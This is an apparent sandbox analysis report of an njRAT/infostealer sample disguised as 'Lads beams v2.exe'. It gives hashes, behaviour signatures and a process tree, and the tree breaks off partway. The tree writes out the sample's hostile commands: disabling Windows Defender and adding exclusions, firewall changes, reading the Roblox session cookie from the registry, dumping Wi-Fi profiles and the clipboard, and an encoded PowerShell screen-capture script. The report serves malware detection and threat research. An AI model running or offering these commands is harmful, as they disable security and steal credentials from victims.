Analysis

  • max time kernel
    1151s
  • max time network
    1123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2024 07:52

General

  • Target

    Lads beams v2.exe

  • Size

    7.6MB

  • MD5

    2c5d4639d934ec4ca3ecef06aec24c1d

  • SHA1

    183218073c262d05a32bfdd4976a19de297b4d37

  • SHA256

    88ec1a1189573981d407cbb781939a413097f249b746f0eba01576fb7961f099

  • SHA512

    a8f0705e955ec0fd01a988b45504727c340f97cc79338ceb446f0b33869aac130759e92f790b05632ef7c786af3743f19b8ba55a1dc7c3684959937d8e40009e

  • SSDEEP

    196608:khrPh9Gs3WVaCbpHMwg4q9QFzAZNbUHYFSsNez:QlEsGHpJg40QyZlCIDq

Malware Config

Signatures

  • Njrat family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lads beams v2.exe
    "C:\Users\Admin\AppData\Local\Temp\Lads beams v2.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3360
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAZABiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYQBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAbABqACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4964
    • C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1688
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1152
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        PID:4128
        • C:\Windows\SysWOW64\PING.EXE
          ping 0 -n 2
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4012
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2100
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3524
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3632
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3292
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2628
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3116
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3412
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1188
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4512
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1632
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3076
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          4⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:4520
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            5⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4596
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3400
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:912
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Windows\system32\tree.com
            tree /A /F
            5⤵
              PID:4288
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            4⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:4060
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:2864
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5052
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              5⤵
              • Gathers system information
              PID:2924
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2932
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              5⤵
                PID:1140
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1812
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3500
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ngz0sedb\ngz0sedb.cmdline"
                  6⤵
                    PID:3708
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A78.tmp" "c:\Users\Admin\AppData\Local\Temp\ngz0sedb\CSCB4DD5AF26C8244C9976EA69F2847C213.TMP"
                      7⤵
                        PID:2864
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  4⤵
                    PID:792
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      5⤵
                        PID:4968
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                      4⤵
                        PID:1712
                        • C:\Windows\system32\attrib.exe
                          attrib -r C:\Windows\System32\drivers\etc\hosts
                          5⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:700
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        4⤵
                          PID:4416
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            5⤵
                              PID:3664
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                            4⤵
                              PID:1140
                              • C:\Windows\system32\attrib.exe
                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                5⤵
                                • Drops file in Drivers directory
                                • Views/modifies file attributes
                                PID:3992
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              4⤵
                                PID:4148
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  5⤵
                                    PID:1632
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    5⤵
                                      PID:4648
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                    4⤵
                                      PID:3712
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        5⤵
                                          PID:3116
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist /FO LIST
                                          5⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4036
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        4⤵
                                          PID:4004
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            5⤵
                                              PID:1400
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            4⤵
                                              PID:4060
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                5⤵
                                                  PID:1712
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                4⤵
                                                  PID:2936
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2236
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  4⤵
                                                    PID:2340
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      5⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4060
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                    4⤵
                                                      PID:4360
                                                      • C:\Windows\system32\getmac.exe
                                                        getmac
                                                        5⤵
                                                          PID:3568
                                                      • C:\Windows\system32\cmd.exe
